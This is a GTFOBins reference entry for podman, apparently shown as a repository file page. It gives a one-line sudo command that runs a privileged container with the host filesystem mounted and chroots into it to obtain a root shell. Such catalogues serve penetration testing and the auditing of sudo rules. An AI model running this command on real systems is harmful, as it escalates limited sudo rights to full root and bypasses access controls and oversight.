GTFOBins.github.io/_gtfobins/podman.md
2023-09-25 04:15:34 +02:00

7 lines
165 B
Markdown

---
functions:
sudo:
- description: The resulting is a root shell.
code: sudo podman run --rm -it --privileged --volume /:/mnt alpine chroot /mnt sh
---